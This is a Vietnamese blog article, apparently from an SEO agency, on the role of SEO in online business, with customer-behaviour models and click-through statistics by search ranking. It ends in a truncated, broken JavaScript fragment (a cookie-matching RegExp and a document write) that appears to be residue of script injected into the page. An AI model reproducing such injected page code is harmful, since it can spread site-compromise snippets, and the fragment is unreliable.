Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > SEO > SEO trong kinh doanh trực tuyến

SEO trong kinh doanh trực tuyến

Thuật ngữ SEO hiện nay chắc không còn nhiều người xa lạ, nhưng không phải ai cũng biết được tầm quan trọng và hiệu quả của SEO trong kinh doanh trực tuyến.

Trước khi bàn về hiệu quả của SEO chúng ta hãy phân tích về hành vi người dùng (khách hàng) trước kia và hiện nay.

  • Hành vi khách hàng trước kỷ nguyên internet:

hành vi người dùng trước kỷ nguyên số

Chú ý –> Thích thú–> Ham muốn –> Ghi nhớ –> Mua hàng

  • Hành vi khách hàng hiện nay:

hành vi người dùng trực tuyến

Chú ý –> Thích thú –> Tìm kiếm –> Mua hàng –> Chia sẻ

 Chúng ta nhận thấy rõ sự khác biệt trong hành vi khách hàng. Sự thể hiện rõ nhất là 2 chữ S: Search (Tìm kiếm) và Share (Chia sẻ). Khách hàng hiện nay khi có nhu cầu cần mua 1 sản phẩm, dịch vụ nào đó họ sẽ lên mạng tìm kiếm và sau khi mua họ lại chia sẻ trên internet với mọi người. Đây chính là 2 thời điểm mấu chốt để marketing online hiệu quả.

Chữ S đầu tiên là Search, khách hàng sẽ tìm kiếm, vậy để marketing, để xuất hiện trước mắt khách hàng chúng ta phải xuất hiện trên kết quả tìm kiếm. Đó chính là công việc của 1 người làm SEO.

Tối ưu hóa công cụ tìm kiếm để người dùng thấy website của mình có thứ hạng cao với những từ khóa mà họ đang tìm.

Ví dụ: Nếu bạn là chủ 1 cửa hàng bán linh kiện máy tính, sử dụng Google Keyword Tools bạn sẽ thống kế được tại Việt Nam, sử dụng ngôn ngữ Tiếng Việt, 1 tháng có ~1300 lượt tìm kiếm cho từ khóa: “linh kiện máy tính”. Nếu như website của bạn hiện diện trên Google bạn sẽ có cơ hội tiếp đón ~1300 lượt khách vào website của bạn trong 1 tháng.

Nhưng trên bảng kết quả tìm kiếm của Google thì không chỉ có SEO mà còn có quảng cáo hiển thị Google Adwords. Và theo như 1 số nghiên cứu của các công ty chuyên về khảo sát trực tuyến thì tỷ lê click vào quảng cáo là 35%, như vậy số click vào kết quả SEO còn chiếm khoảng 65%.

Và tỷ lệ click của thứ hạng cũng khác nhau. Tỷ lệ cho kết quả đầu tiên chiếm đến khoảng 34% lượng click, và nó gần bằng tổng của kết quả 2 cho đến 5. Có 1 chú ý là nếu bạn xếp cuối của trang 1 tức là vị trí thứ 10 bạn vẫn nhận được số click nhiều hơn vị trí đầu của trang 2 khoảng 143%.

Điều đó cho thấy nếu để SEO thực sự mang lại nhiều khách hàng cho bạn thì chí ít bạn cũng phải xuất hiện tại trang 1 và từ kết quả thứ 5 trở lên.

Nhưng nếu SEO chỉ là thứ hạng, thì cũng chưa đủ. Khách hàng nhìn thấy bạn, ok rất tốt, bạn sẽ được nhiều người để ý, nhưng nếu họ chỉ nhìn thôi hoặc họ có vào website của bạn nhưng lại chẳng mua hay quan tâm gì mà thoát ra luôn thì lúc này thứ hạng bạn cao đến mấy cũng là vô ích.

Điều đó chính là bản chất của SEO mà chúng tôi sẽ chia sẻ trong 1 bài viết sắp tới. (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘